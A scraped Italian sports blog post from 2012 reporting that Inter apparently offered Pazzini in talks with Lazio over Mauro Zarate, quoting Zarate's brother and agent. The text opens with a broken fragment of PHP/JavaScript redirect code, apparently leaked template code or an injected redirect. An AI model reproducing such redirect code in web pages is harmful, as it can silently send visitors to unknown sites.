location.href='". $red ."';"; exit(); } ?> Notizie 24 News: Clamoroso, l’Inter ha pronta l’offerta per Zarate

Ads 468x60px

Random Post

Template Updates

giovedì 24 maggio 2012

Clamoroso, l’Inter ha pronta l’offerta per Zarate


Ve lo avevamo fatto sapere noi di Canale Inter ieri sera in questo articolo. Tuttavia, proprio quando sembrava praticamente scontato che Mauro Zarate se ne tornasse mogio mogio alla Lazio, dopo una stagione piuttosto deludente all’Inter, ecco arrivare una clamorosa indiscrezione.
La redazione del sito lalaziosiamonoi.it è riuscita a contattare Sergio Zarate, fratello e procuratore del calciatore, per avere lumi sul futuro dell’argentino. E le sue parole sono state piuttosto inattese: “Questa è una fase di completo stand-by. Non abbiamo avuto ancora contatti con la Lazio o con l’Inter. Da quello che so io le due società hanno provato ad accordarsi inserendo nella trattativa un giocatore che interessa alla Lazio”. Nessuna bocciatura per Mauro, insomma.
Ci sarebbe addirittura un’offerta dell’Inter: “L’Inter ha offerto Pazzini ma c’è un problema legato all’ingaggio dell’attaccante che è piuttosto alto. La trattativa ha subito una frenata, tra poco dovrò parlare con le due società per capire quale potrebbe essere il futuro di Mauro”. Staremo a vedere se effettivamente questa poco plausibile trattativa prenderà piede.

0 commenti:

Posta un commento

 

Sample text

Sample Text

Sample Text